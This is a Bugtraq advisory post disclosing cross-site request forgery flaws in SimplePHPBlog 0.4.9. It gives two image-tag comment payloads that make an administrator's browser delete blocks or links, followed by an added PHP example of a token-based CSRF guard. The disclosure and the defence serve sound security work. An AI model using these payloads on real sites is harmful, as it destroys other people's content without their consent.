Bugtraq mailing list archives
Multiple CSRF in SimplePHPBlog
From: deme () hackish eu
Date: 17 Oct 2007 14:00:55 -0000
SimplePHPBlog Cross Site Request Forgeries

Tested on v0.4.9
Discovered by: Demential
Web: http://hackish.altervista.org
E-mail: deme [at] hackish [dot] eu
SimplePHPBlog website: http://www.simplephpblog.com/

- posting [img=add_block.php?action=delete&block_id=*] in a comment, where * is an ID of a block: when the administrator reads the comment, block * will be erased.
- posting [img=add_link.php?action=delete&link_id=*] in a comment, where * is an ID of a link: when the administrator reads the comment, link * will be erased.
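
Both issues come from delete actions that run on a plain GET request authenticated only by the administrator's session cookie, which an image fetch sends automatically. The guard below is an added example, not SimplePHPBlog code and not part of the original post: it assumes PHP 7 or later, and every function name in it (csrf_token, is_valid_state_change, delete_form, delete_block) is hypothetical. The same check would apply to add_link.php and link_id.

```php
<?php
// Added example: CSRF guard for a delete handler such as add_block.php.
// All function names here are hypothetical, not taken from SimplePHPBlog.
session_start();

// One random token per session, embedded in every admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST that carries the session's token.
// An image fetch is always a GET and cannot supply the token.
function is_valid_state_change(string $method, array $post, array $session): bool {
    if ($method !== 'POST') {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// The admin page renders deletion as a POST form instead of a GET link.
function delete_form(string $block_id): string {
    return '<form method="post" action="add_block.php">'
         . '<input type="hidden" name="action" value="delete">'
         . '<input type="hidden" name="block_id" value="'
         . htmlspecialchars($block_id, ENT_QUOTES) . '">'
         . '<input type="hidden" name="csrf_token" value="' . csrf_token() . '">'
         . '<button type="submit">Delete block</button></form>';
}

// Reject any delete request (GET or POST) that fails the check.
if (($_REQUEST['action'] ?? '') === 'delete') {
    $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
    if (!is_valid_state_change($method, $_POST, $_SESSION)) {
        http_response_code(403);
        exit('Request rejected: POST with a valid CSRF token is required.');
    }
    $block_id = (string) ($_POST['block_id'] ?? '');
    // delete_block($block_id);  // hypothetical: the application's own delete routine
}
```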